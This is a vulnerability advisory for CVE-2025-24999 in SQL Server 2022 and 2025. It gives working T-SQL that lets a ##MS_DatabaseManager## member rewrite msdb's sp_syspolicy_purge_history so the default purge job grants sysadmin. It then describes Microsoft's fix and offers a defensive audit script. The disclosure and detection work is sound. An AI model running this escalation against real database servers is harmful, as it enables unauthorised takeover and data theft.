Title: Microsoft SQL Server Privilege Elevation Through ##MS_DatabaseManager## Role [CVE-2025-24999]
Product: Database
Manufacturer: Microsoft
Affected Version(s): SQL Server 2022, 2025
Tested Version(s): SQL Server 2022, 2025
Risk Level: High
Solution Status: Fixed
CVE Reference: CVE-2025-24999
Base Score: 8.8
Author of Advisory: Emad Al-Mousa

*****************************************

Introduction:

Privilege elevation against database systems is a critical security threat because the database system stores your organization's "jewels": its sensitive data. Once an attacker elevates their account permissions, they can view confidential data, implant malicious code, or cause a denial of service. Unfortunately, SQL Server database technology is prone to privilege elevation attacks; I am documenting all the exploit techniques I find in this unified blog reference article (and will continue to do so in the future):

https://medium.com/@emad.mousa.83/microsoft-sql-server-privilege-escalation-elevation-exploits-proof-of-concpet-80fb1e45699b

*****************************************

Proof of Concept (PoC):

In this simulation, use the SQL Server Management Studio (SSMS) client tool to run the SQL queries, and connect to SSMS with an account that holds the SYSADMIN role, as a DBA would. I will create a database login named "acc2" with the password "acc2" and grant it the new server role ##MS_DatabaseManager##:

    USE [master]
    GO
    CREATE LOGIN [acc2] WITH PASSWORD=N'acc2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
    GO
    ALTER SERVER ROLE [##MS_DatabaseManager##] ADD MEMBER [acc2]
    GO

When connected as the database login "acc2" you can create, alter, and drop any database in the SQL Server instance, as expected.
To verify this, execute the following SQL query as account "acc2":

    SELECT SUSER_NAME() AS Myname, * FROM sys.fn_my_permissions(NULL, NULL);
    GO

Now the "exploit" part of the vulnerability: escalating to SYSADMIN. Right-click the msdb database and choose "New Query", then run the following SQL code, which modifies the system stored procedure sp_syspolicy_purge_history so that it grants the acc2 account the SYSADMIN role:

    ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history]
    AS
    BEGIN
        ALTER SERVER ROLE [sysadmin] ADD MEMBER [acc2]
    END

Consequently, my permissions are elevated to the sysadmin role when the standard, default job syspolicy_purge_history is executed on its schedule. The job syspolicy_purge_history exists in ALL installations of the SQL Server database engine by default. For the sake of the simulation, run the job manually from SSMS with your SYSADMIN (DBA) account, then refresh the database connection of the acc2 account: you will see that it is now a member of the SYSADMIN role!

After applying the security update released in August 2025 (KB5063756), Microsoft's fix uses a certificate-based account with low permissions and changes the job's T-SQL execution code as follows:

    EXECUTE AS LOGIN = '##MS_PolicyTsqlExecutionLogin##' WITH NO REVERT;
    EXEC msdb.dbo.sp_syspolicy_purge_history

So even if the procedure code is changed, it will run with the power of the low-permission certificate account ##MS_PolicyTsqlExecutionLogin##.

*****************************************

Remarks and Conclusions:

- Clear exploit steps, further analysis and attack methods are documented here:
  https://databasesecurityninja.wordpress.com/2026/04/02/microsoft-sql-server-privilege-elevation-through-ms_databasemanager-role-cve-2025-24999/
- The ##MS_DatabaseManager## server-level role can still be abused for privilege elevation, so you will need to implement defence-in-depth tactics for protection.
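As an added defensive check (example code written for this advisory, not part of the original advisory or of Microsoft's fix), the following T-SQL audits the three things the PoC touches: membership of ##MS_DatabaseManager## and sysadmin, whether the syspolicy_purge_history job step is in the post-KB5063756 form, and whether the body of sp_syspolicy_purge_history carries role-changing statements. It assumes the default job and procedure names and relies on simple string matching, so treat its output as a heuristic to review, not a definitive tamper verdict.

```sql
-- Added defensive audit for CVE-2025-24999 (example, not from the advisory).
-- Run from SSMS as a sysadmin. Assumes the default job and procedure names.
USE msdb;
GO

-- 1. Server-level membership: who holds ##MS_DatabaseManager## or sysadmin?
SELECT r.name AS role_name, m.name AS member_name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'##MS_DatabaseManager##', N'sysadmin')
ORDER BY r.name, m.name;
GO

-- 2. Job step: does syspolicy_purge_history run the procedure under the
--    low-permission certificate login introduced by KB5063756?
--    ([_] escapes the LIKE single-character wildcard.)
SELECT j.name AS job_name, s.step_id, s.step_name, s.database_name, s.command,
       CASE WHEN s.command LIKE N'%EXECUTE AS LOGIN%##MS[_]PolicyTsqlExecutionLogin##%'
            THEN 'patched form'
            ELSE 'NOT the patched form: review the step command'
       END AS job_step_status
FROM dbo.sysjobs AS j
JOIN dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE j.name = N'syspolicy_purge_history';
GO

-- 3. Procedure body: role-changing statements inside the body indicate
--    PoC-style tampering; a modify_date later than create_date also
--    warrants a look (cumulative updates can move it too, so it is not
--    conclusive on its own).
SELECT o.name, o.create_date, o.modify_date,
       CASE WHEN m.definition LIKE N'%ALTER SERVER ROLE%'
              OR m.definition LIKE N'%sp[_]addsrvrolemember%'
            THEN 'SUSPICIOUS: role-changing statement in body'
            ELSE 'ok'
       END AS body_status
FROM sys.objects AS o
JOIN sys.sql_modules AS m ON m.object_id = o.object_id
WHERE o.name = N'sp_syspolicy_purge_history' AND o.type = 'P';
GO
```

Any unexpected member in query 1, a job step that is not in the patched form in query 2, or a SUSPICIOUS body in query 3 should be followed by reviewing the full step command and procedure definition before remediating.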
*****************************************

References:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24999
https://nvd.nist.gov/vuln/detail/CVE-2025-24999
https://databasesecurityninja.wordpress.com/2026/04/02/microsoft-sql-server-privilege-elevation-through-ms_databasemanager-role-cve-2025-24999/
https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/server-level-roles?view=sql-server-ver17